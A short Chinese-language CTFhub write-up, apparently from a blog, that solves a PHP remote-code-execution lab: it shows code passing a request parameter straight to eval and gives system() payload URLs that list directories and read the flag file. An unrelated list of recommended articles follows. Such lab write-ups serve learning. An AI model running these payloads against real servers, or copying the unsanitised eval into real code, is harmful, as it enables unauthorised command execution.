CTFhub-RCE-evel执行

携柺星年2023-11-13 11:42

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
董员外4 分钟前
LangChain.js 快速上手指南:模型接入、流式输出打造基础
前端·javascript·后端
没有bug.的程序员4 分钟前
Git 高级进阶:分支管理模型内核、Rebase 物理重塑与版本控制协作深度实战指南
java·git·分支管理·版本控制·rebase
Anastasiozzzz6 分钟前
深入理解JIT编译器:从基础到逃逸分析优化
java·开发语言·jvm
AomanHao8 分钟前
基于高德地图JS的旅游足迹,可嵌入个人博客中
前端
用户4099322502128 分钟前
Vue3组件开发中如何兼顾复用性、可维护性与性能优化?
前端·vue.js·trae
千寻girling9 分钟前
面试官 : “ 请问你实际开发中用过 函数柯理化 吗? 能讲一下吗 ?”
前端·javascript·面试
golang学习记10 分钟前
Claude Opus 4.6 正式发布:Agent 时代的编程王者与长上下文革命
前端·人工智能·后端
独自破碎E11 分钟前
BISHI56 分解质因数
java·开发语言
双向3313 分钟前
RAG实战解密:三步构建你的智能文档问答系统(附开源方案)
前端
感性的程序员小王25 分钟前
拒绝硬编码!利用 Java SPI 打造一个可插拔的代码解析器
java·后端
热门推荐
01从零搭建一个 PHP 登录注册系统(含完整源码)02使用 1panel面板 部署 php网站03GitHub 镜像站点04AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot05MIUI显示/隐藏5G开关的方法,信号弱时开启手机Wifi通话方法06PHP Error: 常见错误及其解决方法07Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services08openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南09如何将 TRAE IDE 的插件市场源切换至 VS Code 官方市场10全面体验 Grok API 中转站(2025 · Grok 4 系列最新版)